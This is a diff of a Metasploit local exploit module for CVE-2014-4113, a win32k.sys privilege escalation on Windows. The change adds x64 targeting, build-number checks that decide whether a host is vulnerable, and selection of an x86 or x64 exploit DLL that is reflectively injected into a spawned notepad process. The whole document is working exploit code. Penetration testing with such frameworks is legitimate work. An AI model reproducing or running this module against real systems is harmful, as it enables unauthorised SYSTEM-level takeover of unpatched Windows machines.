'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Unknown', # vulnerability discovery and exploit in the wild
|
'Unknown', # vulnerability discovery and exploit in the wild
|
||||||
'juan vazquez' # msf module
|
'juan vazquez', # msf module (x86 target)
|
||||||
|
'Spencer McIntyre' # msf module (x64 target)
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'SessionTypes' => [ 'meterpreter' ],
|
'SessionTypes' => [ 'meterpreter' ],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
|
@ -46,14 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
# * Windows 2003 SP2
|
# * Windows 2003 SP2
|
||||||
# * Windows 7 SP1
|
# * Windows 7 SP1
|
||||||
# * Windows 2008
|
# * Windows 2008
|
||||||
[ 'Windows 32 bits', { } ]
|
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||||
|
# Tested on (64 bits):
|
||||||
|
# * Windows 7 SP1
|
||||||
|
# * Windows 2008 R2 SP1
|
||||||
|
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||||
],
|
],
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 4096,
|
'Space' => 4096,
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['CVE', '2014-4113'],
|
['CVE', '2014-4113'],
|
||||||
['OSVDB', '113167'],
|
['OSVDB', '113167'],
|
||||||
|
@ -73,11 +79,27 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||||
|
arch = ARCH_X86_64
|
||||||
|
elsif sysinfo["Architecture"] =~ /x86/i
|
||||||
|
arch = ARCH_X86
|
||||||
|
end
|
||||||
|
|
||||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||||
major, minor, build, revision, branch = file_version(file_path)
|
major, minor, build, revision, branch = file_version(file_path)
|
||||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||||
|
|
||||||
Exploit::CheckCode::Detected
|
# Neither target suports Windows 8 or 8.1
|
||||||
|
return Exploit::CheckCode::Safe if build == 9200
|
||||||
|
return Exploit::CheckCode::Safe if build == 9600
|
||||||
|
|
||||||
|
if arch == ARCH_X86
|
||||||
|
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
|
||||||
|
else
|
||||||
|
return Exploit::CheckCode::Detected if build == 7601
|
||||||
|
end
|
||||||
|
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -85,10 +107,16 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
if check == Exploit::CheckCode::Safe
|
||||||
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||||
|
end
|
||||||
|
|
||||||
if sysinfo["Architecture"] =~ /wow64/i
|
if sysinfo["Architecture"] =~ /wow64/i
|
||||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||||
elsif sysinfo["Architecture"] =~ /x64/
|
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||||
fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
|
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||||
|
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||||
|
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status('Launching notepad to host the exploit...')
|
print_status('Launching notepad to host the exploit...')
|
||||||
|
@ -104,7 +132,13 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', 'cve-2014-4113.x86.dll')
|
if target.arch.first == ARCH_X86
|
||||||
|
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||||
|
else
|
||||||
|
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||||
|
end
|
||||||
|
|
||||||
|
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||||
library_path = ::File.expand_path(library_path)
|
library_path = ::File.expand_path(library_path)
|
||||||
|
|
||||||
print_status("Injecting exploit into #{process.pid}...")
|
print_status("Injecting exploit into #{process.pid}...")
|
||||||
|
|
Loading…
Reference in New Issue